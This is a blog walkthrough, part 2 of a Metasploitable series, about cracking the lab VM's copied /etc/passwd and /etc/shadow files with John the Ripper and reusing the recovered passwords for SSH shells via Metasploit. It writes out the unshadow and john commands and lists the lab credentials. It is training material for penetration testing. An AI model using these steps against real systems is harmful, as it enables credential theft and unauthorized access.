Metasploitable Guide Part 2 : Easy Shells

Posted: November 20, 2011 in Guides
Tags: , , ,

For those of you who are new to the Metasploitable guide, which is a multi-part walk through of Metasploitable (A vulnerable VM produced by Rapid7). You may wish to read part one of the Metasploitable Guide first, as this section will rely on that guide being completed. For this section we will be using John The Ripper, so if you don’t have that installed you may wish to do so now.

Now I know that most of you are thinking, we rooted the box in the last guide we won, right? Well yes, if you’re a cracker kid on the Internet and someone was dumb enough to put something that insecure on a public network, yes you won. Now this is about exploiting the system to the fullest, because in the end this is nothing but practice for a live engagement. You can’t drop a pentest report in front of someone that says “You suck” here’s a bunch of logs from Nessus. Well you could but it definitely wouldn’t conform to the PTES. So for the sake of completeness we need to exploit EVERY vulnerability. Face it, rooting a box is easy. Taking what you did and turning it into actionable information, that’s difficult.

Note : For this I’m using Back Track 5, however to follow along you must at a minimum have John The Ripper, Nmap and Metasploit installed.

Let’s Crack Some Passwords

If you remember we left off last time with a root shell on the Metasploitable box from exploiting the usermap vulnerability in Samba 3.0.20. If you recall at the end of the guide I said you should grab a copy of the /etc/shadow- and /etc/passwd files. If you haven’t done that you should do so now.

Note : for the purposes of this guide , I’m placing the two files in /root/ms/passwd and /root/ms/shadow-

Unshadow Utility

So now that we have the shadow and the passwd file we want to use, we’re going to use the Unshadow utility that comes with John The Ripper to create an unshadow password file (I know…Novel concept huh?)

unshadow /root/ms/passwd /root/ms/shadow- > /root/ms/unshadowed

Will suffice.

John the Ripper

After this we can check for weak passwords by doing the following

john --show /root/ms/unshadowed

So now we have a few more accounts.

Which are (in username:password format)

  • msfadmin:msfadmin
  • postgres:postgres
  • user:user
  • service:service

Note: If you’re so inclined you can repeat this process with /etc/shadow as opposed to /etc/shadow- and you’ll pick up the passwords for the klog:123456789 and sys:batman accounts. You can do this by running the following

unshadow /root/ms/passwd /root/ms/shadow > /root/ms/unshadowed2
john /root/ms/unshadowed2

Getting Some SSH Shells

Now that we have some new credentials, we can grab a few more shells on the system. We’re going to do this by using an SSH module in Metasploit. If you recall from our nmap scan that our server was running an SSH service. To streamline this process I placed our new usernames into a file called credentials in the /root/ms directory. Since our usernames and passwords were all the same we will not need a seperate wordlist for this.

So after we run our SSH login module, we should come up with an additional 3 shells, at this point we should have something like this.


Next time we’ll discuss profiling and exploiting the remaining services running on the system.

  1. […] the last part of the Metasploitable guide we obtained the usernames and passwords of all users with a shell as […]

  2. wibbs says:

    This a great tutorial. Loving it. Can you explain how exactly we are suppose to get the copies of the shadow file and the passwd file onto our local metasploit machine after we have exploited the box? scp still requires valid credentials which don’t technically have yet. Thanks!

  3. wibbs says:

    ooooh. gotcha. great. thanks!

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s